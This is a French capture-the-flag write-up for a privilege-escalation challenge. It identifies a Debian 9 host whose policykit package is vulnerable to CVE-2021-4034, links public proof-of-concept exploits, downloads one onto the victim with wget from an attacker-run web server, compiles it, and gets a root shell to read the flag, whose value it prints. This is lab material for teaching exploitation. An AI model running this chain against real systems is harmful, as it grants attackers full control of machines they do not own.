# Write up Game of Drones 3 (part 3)

## Consigne:

```
Vous vous êtes déplacé latéralement sur une autre machine, mais vos privilèges ne sont pas élevés ...

Pour réaliser ce challenge, vous devez avoir réussi "*Game of Drones 3 - part 1 et 2*", et utiliser le même environnement virtuel.
```

## Pièce jointe :

*Néant*

## Serveur :

```
PortailVMS
```

## Points attribués :

```
TODO
```

## Hint : 

```
TODO
```

## Flag :

```
fl@g{SU1Dprograms4reDang3rOus}
```

## Solution : 

Je suis sur un serveur debian 9, avec *policykit* installé (vulnérabilité découverte récemment) :
```bash
cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"

dpkg -l | grep policykit
ii  policykit-1                 0.105-18+deb9u1               amd64        framework for managing administrative policies and privileges
```

La version *0.105-18* de *policykit* est vulnérable.

Voici deux POC :
 - https://github.com/arthepsy/CVE-2021-4034/
 - https://github.com/mebeim/CVE-2021-4034

Je récupère le POC localement sur ma machine, et je repartage en créant un serveur WEB en python :
```bash
python3 -m http.server 8088
```

et sur la machine victime (remplacer par votre adresse IP):
```bash
wget http://172.24.8.9:8088/cve-2021-4034-poc.c
```

Je compile et j'exécute l'exploit :
```bash
jerome@lxd-fd7bc-ssh-dmz:~$ gcc -o cve-2021-4034-poc cve-2021-4034-poc.c
jerome@lxd-e9976-ssh-dmz:~$ ./cve-2021-4034-poc
./cve-2021-4034-poc
id
uid=0(root) gid=0(root) groups=0(root),1000(jerome)

cat /flag
fl@g{SU1Dprograms4reDang3rOus}
```

<!-- Ok F : 20220423 -->